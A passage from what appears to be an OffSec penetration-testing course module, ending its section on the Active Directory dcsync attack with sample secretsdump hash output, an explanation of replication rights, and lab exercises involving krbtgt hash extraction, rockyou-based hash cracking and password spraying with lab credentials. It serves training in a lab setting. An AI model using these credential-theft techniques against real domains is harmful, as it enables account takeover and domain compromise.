dave:aes256-cts-hmac-sha1-96:4d8d35c33875a543e3afa94974d738474a203cd74919173fd2a64570c51b1389
dave:aes128-cts-hmac-sha1-96:f94890e59afc170fd34cfbd7456d122b
dave:des-cbc-md5:1a329b4338bfa215
[*] Cleaning up...
Listing 33 - Using secretsdump to perform the dcsync attack to obtain the NTLM hash of dave
Listing 33 shows that we successfully obtained the NTLM hash of dave. The output of the tool states that it uses DRSUAPI,6 the Microsoft API implementing the Directory Replication Service Remote Protocol.
The dcsync attack is a powerful technique to obtain any domain user credentials. As a bonus, we can use it from both Windows and Linux. By impersonating a domain controller, we can use replication to obtain user credentials from a domain controller. However, to perform this attack, we need a user that is a member of Domain Admins, Enterprise Admins, or Administrators, because there are certain rights required to start the replication. Alternatively, we can leverage a user with these rights assigned, though we're far less likely to encounter one of these in a real penetration test.
(Microsoft, 2017), https://msdn.microsoft.com/en-us/library/cc228086.aspx ↩︎
(Microsoft, 2016), https://technet.microsoft.com/en-us/library/cc772726(v=ws.10).aspx ↩︎
(Microsoft, 2019), https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/b63730ac-614c-431c-9501-28d6aca91894 ↩︎
(Active Directory Security, 2016), https://adsecurity.org/?p=2398#MimikatzDCSync ↩︎
(Samba Wiki, 2015), https://wiki.samba.org/index.php/DRSUAPI ↩︎
Resources
Some of the labs require you to start the target machine(s) below.
Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text and video.
Labs
- Follow the steps outlined in this section to perform the dcsync attack to obtain the NTLM hash of the krbtgt account. Enter the NTLM hash as answer to this question.
- Capstone Exercise: Once VM Group 2 is started, the domain corp.com has been modified. Use the techniques from this Module to obtain access to the user account maria and log in to the domain controller. To perform the initial enumeration steps you can use pete with the password Nexus123!. You'll find the flag on the Desktop of the domain administrator on DC1. If you obtain a hash to crack, create and utilize a rule file which adds nothing, a "1", or a "!" to the passwords of rockyou.txt.
- Capstone Exercise: Once VM Group 3 is started, the domain corp.com has been modified. By examining leaked password database sites, you discovered that the password VimForPowerShell123! was previously used by a domain user. Spray this password against the domain users meg and backupuser. Once you have identified a valid set of credentials, use the techniques from this Module to obtain access to the domain controller. You'll find the flag on the Desktop of the domain administrator on DC1. If you obtain a hash to crack, reuse the rule file from the previous exercise.
22.3. Wrapping Up
In this Module, we explored NTLM and Kerberos authentication. These authentication methods are crucial for penetration testers to understand in order to perform penetration tests in AD environments. Without grasping the concepts of how authentication works, it is not possible to understand how the attacks shown in this Module work on a technical level. To perform them in real assessments, we often have to adapt these techniques to be effective.
The attack methods from this Module provide us with the necessary skills to perform attacks on AD authentication. These techniques will help us tremendously to obtain valid user credentials and access to systems and services.
In the next Module Lateral Movement in Active Directory, we'll build on the knowledge and skills provided in this Module to move laterally in an AD environment.
- © 2024 OffSec |
- Privacy |
- Terms of service
Previous Module
Active Directory Introduction and Enumeration
Next Module
Lateral Movement in Active Directory
